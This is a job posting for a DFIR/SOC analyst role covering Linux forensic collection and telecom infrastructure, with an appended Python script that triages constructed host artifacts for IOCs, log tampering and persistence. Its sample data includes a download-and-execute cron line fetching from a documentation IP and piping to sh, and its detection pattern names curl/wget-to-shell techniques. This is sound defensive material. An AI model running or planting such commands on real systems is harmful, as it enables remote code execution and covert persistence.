Posted: 1 week ago | Platform: LinkedIn

Work Mode

On-site

Job Type

Full Time

Job Description

DFIR/SOC Analyst

Expertise in Forensic Log Collection on Linux Machines
· Proficient in acquiring system-level artifacts from Linux environments for digital forensic analysis.
· Experience with forensic acquisition and analysis tooling such as UAC (Unix-like Artifacts Collector), Log2Timeline (Plaso), Volatility, FTK, EnCase and Eric Zimmerman's tools.

Development of Customized Scripts
· Tailoring the default UAC collection (its profiles and artifact definitions) to fit specific incident response or investigation use cases, including application logs.
· Performance tuning to minimize system impact during live data acquisition.
· Custom scripts for parsing and pattern-based detection (Python, Bash, etc.).

Strong Understanding of Telecom Components
· Familiarity with core telecom infrastructure such as:
  · Signaling systems (SS7, SIP, Diameter)
  · Network elements (MME, PGW, SGW, SIGTRAN, SPF, AMF, UPF, MSC, HLR, VLR, UDC, GTP, etc.)

Bulk Analysis of Collected Artifacts
· Triaging and prioritizing systems based on severity and the presence of confirmed IOCs or TTPs.
· Investigating a large number of systems in bulk using artifacts collected from Linux systems.
· Leveraging automation and scripting (e.g., Python, Bash, YARA rules) to parse and analyze forensic data efficiently.
· Identifying Indicators of Compromise (IOCs), suspicious behavior patterns and anomalies, including:
  · lateral movement, privilege escalation and anomalous process execution;
  · persistence mechanisms (e.g., rootkits, startup script modifications, backdoored binaries);
  · timestamp tampering or time-skewing that indicates anti-forensic behavior.
· Correlation of events across systems and timeframes to establish timelines and root causes.
· Identification of unauthorized access, unauthorized configuration changes, malicious binaries, persistence, data exfiltration, etc.
· Support in post-incident activities such as RCA sessions or tabletop exercises.
· Validation of password reset activities.

Documentation and Reporting
· Compilation of forensic findings into a structured and comprehensive report, including:
  • Executive summary
  • Technical findings with evidence
  • Timeline of events
  • Mapping of detections to MITRE ATT&CK TTPs
  • Recommendations for remediation and mitigation
  • Detection use-case recommendations based on the observed TTPs
· Maintenance of internal documentation to support audit trails and reproducibility of analysis.

Interpersonal Skills
· Ability to communicate complex technical findings effectively to both technical and non-technical audiences.
· Strong analytical and problem-solving skills, with attention to detail and accuracy.
· Self-driven and able to work effectively in high-stress situations, handling multiple incidents simultaneously.
· Demonstrated ability to work both independently and collaboratively within a team.
· Flexible in shifts.
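The bulk-analysis duties listed above (IOC matching across many hosts, timestamp-tampering checks, persistence review and a cross-host timeline) in working form, as an added example that is not part of the posting or of any employer tooling. It assumes each host's UAC-style collection has already been unpacked and flattened into lists of text lines keyed by artifact name; the hostnames (named after telecom network elements), indicators, cron entries and log lines are constructed for the example, and the severity weights in `triage` are illustrative rather than a standard.

```python
"""Bulk triage of Linux artifacts from many hosts (added example). Assumes each
host's UAC-style collection is flattened to text lines keyed by artifact name;
every indicator, hostname and log line below is constructed."""
import re
from datetime import datetime, timedelta

# Traditional syslog prefix ("Mar  3 10:58:02 host proc[pid]: msg") carries no year.
SYSLOG_RE = re.compile(r"^(\w{3})\s+(\d{1,2}) (\d{2}:\d{2}:\d{2}) (\S+) (.*)$")
# Cron entries that download-and-execute or run code from volatile paths.
PERSIST_RE = re.compile(r"(curl|wget)[^|]*\|\s*(ba)?sh|/dev/shm/|/tmp/\S+|base64 -d", re.I)

def parse_syslog(line, year):
    """Return (timestamp, host, message) or None for non-syslog lines."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    mon, day, clock, host, msg = m.groups()
    return datetime.strptime(f"{year} {mon} {day} {clock}", "%Y %b %d %H:%M:%S"), host, msg

def ioc_hits(lines, iocs):
    """One (line, matched_iocs) entry per line that contains at least one IOC string."""
    hits = [(ln, [i for i in iocs if i in ln]) for ln in lines]
    return [(ln, m) for ln, m in hits if m]

def time_skew(lines, year, collected_at, tolerance=timedelta(minutes=5)):
    """Entries that run backwards in file order by more than `tolerance`, or that are
    stamped after collection time: both point at clock manipulation or log editing."""
    flagged, prev = [], None
    for ln in lines:
        parsed = parse_syslog(ln, year)
        if parsed is None:
            continue
        ts = parsed[0]
        if ts > collected_at:
            flagged.append(("future", ln))
        elif prev is not None and prev - ts > tolerance:
            flagged.append(("backwards", ln))
        prev = ts
    return flagged

def persistence(crontab_lines, passwd_lines):
    """Suspicious cron jobs plus any UID-0 account that is not root."""
    found = [("cron", ln) for ln in crontab_lines if PERSIST_RE.search(ln)]
    for ln in passwd_lines:
        f = ln.split(":")
        if len(f) >= 3 and f[2] == "0" and f[0] != "root":
            found.append(("uid0", ln))
    return found

def triage(collections, iocs, year, collected_at):
    """Score hosts (IOCs weigh most; weights illustrative) and merge IOC events into one timeline."""
    report, timeline = {}, []
    for host, arts in collections.items():
        auth = arts.get("auth.log", [])
        hits = ioc_hits(auth, iocs)
        skew = time_skew(auth, year, collected_at)
        persist = persistence(arts.get("crontab", []), arts.get("passwd", []))
        report[host] = {"ioc_hits": hits, "time_skew": skew, "persistence": persist,
                        "score": 10 * len(hits) + 5 * len(persist) + 3 * len(skew)}
        for ln, _ in hits:
            p = parse_syslog(ln, year)
            if p:
                timeline.append((p[0], host, p[2]))
    ordered = sorted(report, key=lambda h: report[h]["score"], reverse=True)
    return ordered, report, sorted(timeline)

IOCS = ["203.0.113.7", "svc_backup"]  # constructed indicators from the (hypothetical) case
YEAR, COLLECTED_AT = 2024, datetime(2024, 3, 3, 12, 0, 0)
LOGROTATE = "0 4 * * * root /usr/bin/logrotate /etc/logrotate.conf"
ROOT = "root:x:0:0:root:/root:/bin/bash"
SAMPLE = {
    "mme-01": {
        "auth.log": [
            "Mar  3 10:58:02 mme-01 sshd[4411]: Accepted password for svc_backup from 203.0.113.7 port 51022 ssh2",
            "Mar  3 10:58:40 mme-01 sudo: svc_backup : TTY=pts/0 ; COMMAND=/bin/bash",
            "Mar  3 09:10:00 mme-01 sshd[4411]: pam_unix(sshd:session): session closed for user svc_backup",
            "Mar  3 13:30:00 mme-01 sshd[6001]: Accepted password for svc_backup from 203.0.113.7 port 51090 ssh2",
        ],
        "crontab": ["* * * * * root curl -s http://203.0.113.7/p | sh", LOGROTATE],
        "passwd": [ROOT, "svc_backup:x:0:0::/var/backup:/bin/bash"],
    },
    "pgw-02": {
        "auth.log": ["Mar  3 11:02:17 pgw-02 sshd[912]: Accepted publickey for ops from 10.10.0.5 port 40112 ssh2"],
        "crontab": [LOGROTATE], "passwd": [ROOT, "ops:x:1001:1001::/home/ops:/bin/bash"],
    },
    "sgw-03": {
        "auth.log": ["Mar  3 11:05:44 sgw-03 sshd[2210]: Accepted publickey for ops from 203.0.113.7 port 40113 ssh2"],
        "crontab": [], "passwd": [ROOT],
    },
}

def run_demo():
    """Triage the constructed collections (used by the stand-alone run and the test)."""
    return triage(SAMPLE, IOCS, YEAR, COLLECTED_AT)

if __name__ == "__main__":
    ordered, report, _ = run_demo()
    print([(h, report[h]["score"]) for h in ordered])
```

Run the file directly to get the hosts in work order: mme-01 first (four IOC-bearing lines, a download-and-execute cron job, a second UID-0 account, and two timestamp findings), then sgw-03 (one IOC login), then pgw-02 (clean). Note what the merged timeline does with the tampered data: the mme-01 entry stamped 09:10, which sits out of order in its file, becomes the earliest event in the timeline. That is exactly why the time-skew findings should be reviewed before the timeline is cited as the sequence of events in a report. Against a real UAC archive the inline `SAMPLE` dictionary would be replaced by reading the collected files from the extracted tarball.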
